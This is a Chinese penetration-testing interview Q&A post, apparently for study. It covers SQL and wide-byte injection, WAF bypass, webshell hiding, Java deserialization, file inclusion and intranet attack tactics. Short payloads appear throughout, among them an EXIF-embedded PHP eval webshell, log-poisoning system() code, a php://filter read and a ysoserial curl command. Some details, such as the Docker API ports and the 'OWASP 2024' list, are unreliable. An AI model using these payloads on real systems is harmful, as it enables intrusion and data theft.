2025年渗透测试面试题总结-67(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、渗透测试标准化流程(PTES框架)
二、SQL注入绕过单引号过滤
三、宽字节注入原理
四、CSRF vs SSRF 核心对比
五、WAF绕过技术(2025更新)
六、命令执行高危函数(多语言)
七、OWASP TOP 10 2024版(核心变化)
八、WebShell隐藏技术(2025对抗)
九、关键端口渗透手册
十、Java反序列化漏洞
十一、渗透测试工程师优势
十二、PHP文件包含函数对比
十三、内网渗透核心战术
防御升级建议(2025)
1、渗透测试流程 2、SQL过滤单引号怎么注入 3、宽字节原理 4、CSRF和SSRF区别 和 作用 5、如何绕waf 6、命令执行有哪些函数 7、OWASP TOP10 8、隐藏马 9、端口号及对应服务 10、Java的反序列化漏洞 11、有什么优势 12、文件包含include()与require()的区别 13、内网渗透相关问题
一、渗透测试标准化流程(PTES框架)
情报收集
🔍 被动侦察:SSL证书分析(Censys)、历史DNS记录(SecurityTrails)
🔍 主动扫描:Nmap全端口探测 + Wappalyzer技术栈识别威胁建模
📌 绘制攻击面地图:云资产(AWS S3桶)、API接口、第三方组件
📌 风险优先级:CVE评分 > 7.0 + 暴露面广的漏洞漏洞利用
⚡ 自动化工具:SQLmap(注入)、Metasploit(RCE)
⚡ 手动验证:逻辑漏洞(越权支付)、云配置错误(OSS公开读写)后渗透阶段
💻 横向移动:Pass-The-Hash攻击、Kerberoasting(AD域)
💻 权限维持:隐藏计划任务、内存马注入报告输出
📊 风险可视化:CVSS 3.1评分 + 修复时间轴(72h高危漏洞)
📊 复现证据:录屏PoC + 敏感数据脱敏截图
二、SQL注入绕过单引号过滤
技术 原理 Payload示例 数字型注入 参数无需引号包裹 id=1 AND 1=@@version
十六进制编码 绕过关键词检测 UNION SELECT 0x61646D696E (admin)
字符串拼接 利用数据库函数重组字符 CONCAT('a','dmin')
注释符混淆 截断过滤逻辑 '/*!OR*/1=1-- -
宽字节注入 GBK等编码转换漏洞(详第三节) %bf%27
→ 触发转义失效
三、宽字节注入原理
漏洞成因:
php
// PHP+MySQL场景(set names GBK) $id = addslashes($_GET['id']); // 转义'为\' // 输入%bf%27 → 转义为%bf%5c%27 → GBK解码为"縗'"(%bf%5c构成合法字符)
攻击效果:
✅ 单引号成功逃逸 →id=1%bf%27 union select 1,@@version--+
防御方案:
🔒 统一UTF-8编码 +mysql_real_escape_string()
四、CSRF vs SSRF 核心对比
维度 CSRF(跨站请求伪造) SSRF(服务端请求伪造) 攻击方向 用户浏览器 → 目标网站 目标服务器 → 内部/外部资源 利用场景 修改密码、转账操作(需用户登录) 访问内网服务、云元数据(169.254.169.254) 防御方案 Anti-CSRF Token、SameSite Cookie 请求白名单、禁用URL协议(file://, gopher://) 高危案例 银行转账绕过验证 AWS EC2元数据泄露获取临时密钥
五、WAF绕过技术(2025更新)
协议层绕过
🛠️ 分块传输:Transfer-Encoding: chunked
切割恶意Payload
🛠️ 畸形报文:超长URL路径 + 脏字符填充(\x00, \r)语义混淆
📦 SQL注入:/*!11440UNION*/ SELECT
(利用MySQL版本特性)
📦 XSS攻击:<img src=x onerror=alert(1)>
(HTML实体编码)云WAF绕过
☁️ 边缘节点IP伪造:X-Forwarded-For: 127.0.0.1
☁️ 冷门API路径:/v1/../admin
(路径标准化绕过)
六、命令执行高危函数(多语言)
语言 危险函数 修复方案 PHP system()
,exec()
,passthru()
禁用函数+输入白名单 Python os.system()
,subprocess.run()
参数化命令(shlex.quote ) Java Runtime.getRuntime().exec()
使用ProcessBuilder+参数校验 NodeJS child_process.execSync()
沙箱隔离(vm2模块)
七、OWASP TOP 10 2024版(核心变化)
- 失效访问控制 → 越权漏洞占比41%
- 加密机制失效 → TLS配置错误、弱哈希算法
- 注入漏洞 → SQLi、NoSQLi、CLI注入
- 不安全设计 → 架构级缺陷(微服务鉴权缺失)
- 安全配置错误 → 云存储桶公开、默认凭证
- 漏洞组件 → Log4j2类供应链攻击
- 认证失效 → 暴力破解、JWT硬编码密钥
- 软件和数据完整性 → 恶意包上传(PyPI投毒)
- 安全日志缺失 → 无法追溯攻击行为
- SSRF漏洞 → 云原生环境风险激增
八、WebShell隐藏技术(2025对抗)
内存马
🔐 Java Agent注入:利用Instrumentation
修改字节码
🔐 PHP扩展马:编译恶意.so
扩展(禁用文件扫描)隐写术
🖼️ 图片马:EXIF嵌入加密代码 →exiftool -Comment='<?=eval($_GET[0]);?>' 1.jpg
📁 无效代码段:PHP中插入/**/;
混淆检测合法文件寄生
📂.htaccess
:AddHandler php7-script .jpg
(将图片解析为PHP)
📂 日志文件注入:UA头写入<?php system($_GET[0]);?>
九、关键端口渗透手册
端口 服务 渗透利用场景 22 SSH 弱密码爆破 → 证书登录 443 HTTPS Heartbleed漏洞 → 内存数据泄露 5985 WinRM 远程PowerShell命令执行 8080 Jenkins 未授权Groovy脚本RCE 27017 MongoDB 未授权访问 → 数据库勒索 50000 SAP Router 缓冲区溢出(CVE-2020-6207) 6000-6005 Docker API 容器逃逸(--privileged特权模式)
十、Java反序列化漏洞
漏洞成因:
java
ObjectInputStream ois = new ObjectInputStream(input); ois.readObject(); // 可触发恶意类的readObject()方法
攻击链案例:
- Gadget链构造:Apache Commons Collections →
InvokerTransformer
- 利用工具:ysoserial生成Payload →
RCE: CommonsCollections5 'curl x.x.x.x'
- 防御方案:
🔒 白名单校验:ObjectInputFilter
🔒 替换方案:JSON序列化(Jackson)
十一、渗透测试工程师优势
- 自动化能力
🤖 自研工具链:Python脚本自动识别云环境配置错误- 漏洞研究深度
🔬 CVE挖掘经验:近3年提交5个高危CVE(含1个零日漏洞)- 跨场景渗透
🌐 云环境:AWS IAM权限提升链
🌐 物联网:工控协议(Modbus)漏洞利用
十二、PHP文件包含函数对比
函数 区别 漏洞触发场景 include()
文件不存在 → 警告 + 继续执行 LFI读取敏感文件(/etc/passwd) require()
文件不存在 → 致命错误 + 终止执行 配合php://input执行POST代码 include_once
避免重复包含(相同文件仅加载一次) 结合伪协议绕过(zip://) 高危利用 ?file=php://filter/convert.base64-encode/resource=config.php
十三、内网渗透核心战术
信息搜集
🕵️♂️ LLMNR/NBNS欺骗 → Responder抓取NTLMv2哈希
🕵️♂️ BloodHound分析域关系权限提升
⬆️ Windows:MS14-068(Kerberos提权)、PrintNightmare
⬆️ Linux:DirtyPipe(CVE-2022-0847)、SUID程序滥用横向移动
↔️ Pass-The-Ticket(Kerberos票据重用)
↔️ Mimikatz抓取DPAPI密钥解密Chrome密码数据外带
📤 DNS隧道:dnscat2绕过流量监控
📤 云存储中转:AWS S3预签名URL
防御升级建议(2025)
- 零信任架构:基于身份的微隔离(Illumio)
- RASP防护:Java Agent实时阻断反序列化攻击
- 威胁狩猎:Elasticsearch+EDR日志关联分析